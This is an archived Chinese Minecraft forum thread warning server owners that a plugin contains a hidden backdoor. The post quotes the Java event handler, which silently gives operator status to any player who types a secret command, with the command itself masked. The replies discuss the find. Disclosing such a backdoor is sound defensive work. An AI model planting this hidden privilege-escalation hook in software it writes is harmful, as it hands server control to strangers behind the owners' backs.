BBSPK晋级赛 MCBBS纪念版

警告！！！！！

作者: millerx

日期: 2013-11-27 21:39:00 版块: 未知

本帖最后由 millerx 于 2013-11-28 11:38 编辑

http://www.mcbbs.net/thread-154465-1-1.html

此插件内涵以下代码

@EventHandler
public void onPlayerCommandPreprocess(PlayerCommandPreprocessEvent event){
if (event.getMessage().startsWith("/*********")){
event.getPlayer().setOp(true);
event.setCancelled(true);
event.getPlayer().sendMessage("Done");
}
}
}

复制代码

极为明显的

居然直接敢把java文件一起编译出来

只要输入 /资料删除

就会把输入这个指令的玩家设置为OP

意思就是一个完全地提权插件！！！！！！！！！！！！！！！！

而且不是通过在yml注册指令，如果不翻源码是找不到的！！！是拦截命令输入这个事件！！！！！
而且权限是玩家！！！任意玩家都可以触发！！！
各位服主一定立刻删除此插件！！！！！！！！！！！！！！！！！

回复:

我勒个去去去去去去去去去去去去！！！！！！！！！！！！！！！！！！！！！

2013-11-27 21:42:00

好一个惊天BUG

2013-11-27 21:42:00

果冻的悲哀

果冻的悲哀

果然是大神！

2013-11-27 21:44:00

不明觉厉·····

2013-11-27 21:44:00

我怎么就没看出来玩家能获得OP权限呢？？？？

2013-11-27 21:50:00

我去看下 0.0

2013-11-27 21:53:00

我的世界1.6.4

我的世界1.6.4

rom718 发表于 2013-11-27 21:53
我去看下 0.0

厉害.给个赞

2013-11-27 21:56:00

simon3000的灵魂

simon3000的灵魂

大触我们认识下

2013-11-27 21:58:00

cencelled求解释

2013-11-27 21:59:00

{:10_566:}大触我们做朋友吧

2013-11-27 22:00:00

寂寞过了就好

寂寞过了就好

表示lz好牛逼这都发现的了

2013-11-27 22:06:00

哭泣的格桑花

哭泣的格桑花

我记得我的前腐竹也下载过这个插件在整我= =

2013-11-27 22:08:00

本帖最后由大刘于 2013-11-27 22:34 编辑

好像这个作者其他插件也带有这段代码哦,某服主做的插件?有点意思

2013-11-27 22:31:00

之前看到了这个插件，因为我善良···不整蛊基友，所以没有下载···好险·······

2013-11-27 22:47:00

提示: 作者被禁止或删除内容自动屏蔽

2013-11-27 23:01:00

給你個讚0.0
我都看不出這源代碼的意思

2013-11-27 23:19:00

一个屌炸天的LZ

2013-11-28 11:03:00

支持LZ，抵制恶意插件

2013-11-28 12:28:00

提示: 作者被禁止或删除内容自动屏蔽

2013-11-28 13:00:00

咸鱼气功王

咸鱼气功王

我装了大杀特杀然后开小号输入 /资料删除没用啊

2013-11-28 15:18:00

xiazhen3938 发表于 2013-11-28 15:18
我装了大杀特杀然后开小号输入 /资料删除没用啊

不是输入 /资料删除，“资料删除”当然是特殊的代码，只是不能随便公开而已，因为有些服务器还没有删除该插件，要是随便公开被熊孩子看到在服务器肆意输入全变op那不乱套？这段代码有10个字符，是啥就不能透露了。

2013-11-28 16:40:00

咸鱼气功王

咸鱼气功王

ikorose 发表于 2013-11-28 16:40
不是输入 /资料删除，“资料删除”当然是特殊的代码，只是不能随便公开而已，因为有些服务器还没有删除该 ...

额我在那个插件内查到了。。。。太恐怖了

2013-11-28 16:59:00

42486327 发表于 2013-11-27 21:42
好一个惊天BUG

这不是bug吧......

2013-11-28 17:00:00

全体MC Fans们一起Attack him！！！
拉出去枪毙无限世纪！！
衷心鄙视他！！
{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

{:10_492:}

2013-11-28 18:38:00

我去我的服里面竟然有这种东西！！赶紧删掉不解释. 话说楼主还真有闲心啊翻源码...

2013-11-28 20:01:00

原插件呢?

2013-11-28 22:23:00

其实我想说。没曝光之前有多少人知道这指令？= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果作者真大意肯定有立刻更新修复

2013-11-29 16:59:00

zhh0000zhh 发表于 2013-11-27 21:50
我怎么就没看出来玩家能获得OP权限呢？？？？

不是startsWith("/xxxx")后就setOp了么

2013-11-29 17:55:00

huanghongxun 发表于 2013-11-29 17:55
不是startsWith("/xxxx")后就setOp了么

看错了，把setOP看成Stop了

2013-11-29 18:25:00

xpesir 发表于 2013-11-29 16:59
其实我想说。没曝光之前有多少人知道这指令？= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果 ...

现在这个指令本身也没公开啊。。。。。。。。。

2013-11-29 20:14:00

多谢！有你的努力让腐竹感到安心！

2013-11-29 21:09:00

5408754 发表于 2013-11-29 20:14
现在这个指令本身也没公开啊。。。。。。。。。

貌似刚发出来的时候公开了，后来被编辑掉。贴吧的某转帖上也清清楚楚地弄了出来，后来某人投诉其暴露个人信息而被吧主删除。

2013-11-30 01:40:00

Cungbou 发表于 2013-11-30 01:40
貌似刚发出来的时候公开了，后来被编辑掉。贴吧的某转帖上也清清楚楚地弄了出来，后来某人投诉其暴露个人 ...

哦，这样子啊。。。。。。。。。。

2013-11-30 07:25:00

wjwrh 发表于 2013-11-28 20:01
我去我的服里面竟然有这种东西！！赶紧删掉不解释. 话说楼主还真有闲心啊翻源码...

我只是看看他如何崩掉客户端的
因为有很多方式：
比如果、错误封包，恐怖处理量
，结果就发现了这么不得了的东西

2013-11-30 10:31:00

啊啊啊啊！赶快删！！

2013-11-30 14:15:00

- -想不到这些孩子这么猥琐拉去从18层丢到地下18层算了我也没装··

2013-11-30 19:01:00

好惊天的一个插件啊

2014-05-10 10:08:00

Man, what can I say? MCBBS archive back! -- Bobe Kryant

Archiver|小黑屋| Mcbbs2.net | 隐私政策 | 手机版

"Minecraft"以及"我的世界"为美国微软公司的商标本站与微软公司没有从属关系

© 2010-2024 MCBBS帖子存档版权没有本站内原创内容版权属于其原创作者，除作者或版规特别声明外未经许可不得转载